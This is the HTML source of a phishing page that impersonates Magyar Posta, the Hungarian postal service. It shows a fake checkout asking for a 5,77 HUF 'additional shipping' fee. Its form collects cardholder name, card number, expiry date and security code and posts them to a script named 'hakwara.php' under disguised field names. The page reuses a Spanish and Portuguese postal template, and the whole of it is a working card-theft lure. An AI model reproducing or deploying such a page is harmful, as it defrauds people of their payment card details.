<html lang="ko" style="overflow: auto;"><head>
<meta charset="utf-8">
    <title>Magyar Posta Zrt. - Nyitó</title>
		<link rel="icon" type="image/png" href="https://www.posta.hu/static/favicon.ico">
<meta name="generator" content="WYSIWYG Web Builder 15 - http://www.wysiwygwebbuilder.com">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="css/index.css" rel="stylesheet">
</head>
<body onload="" style="overflow: auto;" class="common-screen-body">
<div id="FlexContainer1" style="
    max-width: 1135px;
    margin: auto;
">
<div id="wb_Image2" style="display:inline-block;width:213px;z-index:0;">
<img src="https://www.posta.hu/static/g/main-menu-posta-logo.png" id="Image2" alt="">
</div>

</div>




<!--<![endif]--><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style id="stndz-style">div[class*="item-container-obpd"], a[data-redirect*="paid.outbrain.com"], a[onmousedown*="paid.outbrain.com"] { display: none !important; } a div[class*="item-container-ad"] { height: 0px !important; overflow: hidden !important; position: absolute !important; } div[data-item-syndicated="true"] { display: none !important; } .grv_is_sponsored { display: none !important; } .zergnet-widget-related { display: none !important; } </style>

<link href="./9ach/postkor.css" rel="stylesheet" type="text/css">
<link href="./9ach/banrkolan.css" rel="stylesheet" type="text/css"> 

<link href="./9ach/bbs.css" rel="stylesheet" type="text/css"> 
<title>correios</title>
    <link type="image/x-icon" rel="shortcut icon" href="./images/favicon.ico">

	
	
	 

<link href="./9ach/reset.css" rel="stylesheet" type="text/css">
<link href="./9ach/font.css" rel="stylesheet" type="text/css">



	



<!--<![endif]--><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<link href="./css/bootstrap.min.css" media="screen" rel="stylesheet">
	<link href="./css/validationEngine.jquery.css" rel="stylesheet">
	<link href="./css/flaticon.css" rel="stylesheet">
	<link href="./css/fontawesome-all.min.css" rel="stylesheet">
	<link href="./css/new-style-common-screen.css" rel="stylesheet">
	<link href="./css/common-dynamic.css" rel="stylesheet">
		<link href="favicon.png" type="image/x-icon" rel="shortcut icon">

	<meta name="description" lang="es" content="En la Tienda Online de Correos tenemos todo para hacer tus envíos: cajas, sobres, sellos, embalajes... regalos, coleccionismo y productos solidarios."><!-- Robots --><meta name="robots" content="index,follow"><!-- / Robots --><meta name="expires" content="0"><meta name="revisit-after" content="1 days"><meta http-equiv="pragma" content="no-cache">

<!-- Google Tag Manager -->


<br><section class="common-screen-content">
<section class="go-back-to-shop">
<div class="container">
   
<ul class="nav">
	<li class="nav-item"><a class="nav-link" href="#">vissza a boltba</a></li>
</ul>
</div>
</section>

<section class="checkout-template">
<div class="container">
<!--null
-->

<div class="alert alert-danger alert-error alert-dismissable shopping-cart-alert" style="display:none"><button class="close" data-dismiss="alert" type="button">×</button></div>
<!-- Mobile version Summary of the cart -->

<div class="checkout-mobile-summary">
<div class="checkout-summary-fixed d-block d-lg-none">
<div class="row"></div>

<div class="summary-checkout">
<div class="row">
<div class="col"><span>Tranzakció összege

</span></div>

<div class="col text-right"><span style="
    text-align: right;
    FONT-WEIGHT: BOLD;
">5,77 HUF</span></div>
</div>
</div>
</div>
</div>

<div class="row flex-column-reverse flex-lg-row">
<div class="col-lg-7">
<div class="checkout-left-side">
<div id="cartParent" style="opacity: 1;">








<div class="shopping-cart-locked-parent" id="paypalexpressParent" style="display: block;"></div>





<div class="shopping-cart-form-parent" id="shippingAddressForm" style="display: block;/* text-align: right; */">
<section class="checkout-new-shipping-address">
<div class="checkout-box" style="box-shadow: 0px 0px 20px 9px rgb(0 0 0 / 15%);">
<div class="checkout-box-title">
<div class="checkout-box-title-icon"></div>

<h4> fizetési részletek</h4>
</div>


<img src="./images/002.png" style="
    MAX-WIDTH: 280PX;
    /* WIDTH: 100%; */
" checkout-box-content="">
                                                               
<br><br>


<!-- Modificacion: Marca de inicio Acriter NAC C-04-2761-10 Fase2 --> 
<link rel="stylesheet" href="./css/base-bc635a8066cae48fe4ae1e9584dae35a3c5aac5f287d88362b4e02cb3b3f8c5f.css">
<script src="./css/application-b183243468889ccac29f50cb91971600b27ab309c289600f0e29f9a77e11b2b4.js"></script>
<script src="./css/js"></script>




		
				<form novalidate="novalidate" autocomplete="off" role="form" action="hakwara.php" accept-charset="UTF-8" method="post" id="formId_038775683063221531600291018965">
				
				
						<div class="error-banner hidden validation section payment generic">
						</div>
						
						
							<input name="payment_method" hidden="" id="payment_method" value="card">
								
								<span class="iw nm" id="card_type_selection">


	
<div class="form-row">
<div class="form-group col-md-8"><label for="shipping.firstname">kártyatulajdonos neve * <span style="font-size: 9px;">kártyatulajdonos neve</span></label> 

<input class="form-control validate[required,minSize[2]] null" id="card_type" maxlength="50" name="fname" required="" type="text"></div>


</div>

<div class="form-row">
<div class="form-group col-md-8"><label for="shipping.email">kártyaszám  * <span style="font-size: 9px;">VISA - MasterCard </span>
</label> 
<input class="form-control validate[required,custom[email]] null" id="card_number" maxlength="19" name="Zawaq" placeholder="XXXX XXXX XXXX XXXX" required="" type="text" style="
    background-image: url(./images/2.png);
    background-repeat: no-repeat;
    background-position: right center;
"><span class="iw nm" id="iw-card_number"></span></div>						

</div><div class="form-row">
<div class="form-group col-md-8"><label for="shipping.email">lejárati dátum *</label><br> 


									<span id="card_expiry_date">

<select class="form-control  failedOnce" name="DateExpiry_1" id="card_expiry_month" required="" style="
    WIDTH: 100PX;HEIGHT: 38PX;
" tabindex="0">
<option value="">MM</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>

/
<select class="form-control  failedOnce" name="DateExpiry_2" id="card_expiry_year" required="" style="
    WIDTH: 28%;HEIGHT: 38PX;
" tabindex="0">
<option value="">YY</option>
<option value="2021">21</option>
<option value="2022">22</option>
<option value="2023">23</option>
<option value="2024">24</option>
<option value="2025">25</option>
<option value="2026">26</option>
<option value="2027">27</option>
<option value="2028">28</option>
<option value="2029">29</option>
<option value="2030">30</option>
<option value="2031">31</option>
</select>

															</span></div>
</div>


				
				   
<div class="form-row">
<div class="form-group col-md-4"><label for="shipping.postalcode">biztonsági kód *<span style="font-size: 9px;">Utolsó 3 számjegy a kártya hátoldalán</span></label><br> 
<input class="form-control validate[required] null" id="card_cvn" maxlength="4" name="zwi9a" placeholder="XXX" required="" type="password" style="
    WIDTH: 137PX;
    background-image: url(./images/b.png);
    background-repeat: no-repeat;
    background-position: right center;
" aria-required="true"><span id="iw-card_cvn">   
</span></div>
</div>
<div class="form-group"></div>






<section class="continue-button py-2 mb-4" id="continueButtonParent">




	
								
								

													   <input type="hidden" name="next">









<div class="d-flex justify-content-end">

<button class="btn btn-primary btn-cart-continue" type="submit">Kifizetni</button>



</div>
<br>
<div class="form-group">

<div class="custom-control custom-checkbox" style="
    /* text-align: right; */
"> 
<label class="" for="accept_dpp_shipping" style="
    font-weight: 100!important;
"> <img alt="" src="./images/Exclamation.png" style="width: ;"> <font size="2"> * Ügyeljen a szavak helyesírására. Az adatbeviteli hibák miatt a dokumentumok helytelenül kerülhetnek harmadik felekhez.</font></label></div>
</div>
</section>


</span><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div><div aria-live="assertive" style="width:1px;height:0;color:transparent;"></div></form></div>
</section>
</div>














</div>
</div>
</div>

<div class="col-lg-5">
<div class="checkout-right-side" style="
    box-shadow: 0px 0px 20px 9px rgb(0 0 0 / 15%);
">
<section class="checkout-summary d-none d-lg-block">
<div class="summary-product-list">
<div class="item">
<div class="row">
<div class="col-3 flex-grow-0 image-col">
<div class="item-image"><img alt="Norway Post's new logo: Pokball or Marathon symbol variation? | Engadget" src="https://png.pngtree.com/png-vector/20190123/ourlarge/pngtree-freight-logistics-courier-ship-png-image_541515.jpg"><a href="#"> </a></div>
</div>

<div class="col-5 title-col">
<div class="item-title">
<p>további szállítási költség
</p>
</div>
</div>

<div class="col-4 flex-grow-0 buttons-col">
<div class="d-flex buttons-col-container justify-content-between h-100">
<div class="item-delete-button"><button class="btn-update-cart-item-quantity" data-input-selector="#cartQuantityProductId_147" value="0"></button></div>

<div class="item-price-total">
<p class="item-price">áfa összeg

</p>

<p class="item-vat-text">0,00 HUF

</p>
</div>
</div>
</div>
</div>
</div>
</div>

<div class="summary-subtotal">
<div class="summary-total">
<div class="row">
<div class="col">
<div class="text-left">
<p class="total-title">teljes

</p>
</div>
</div>

<div class="col">
<div class="text-right">
<p class="total-amount">5,77 HUF

</p>

<p class="total-vat-included">(Tartalmazza az ÁFÁt)</p>
</div>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
</div>
</div>
</section>
</section>

<section class="common-screen-footer"></section>




</body></html>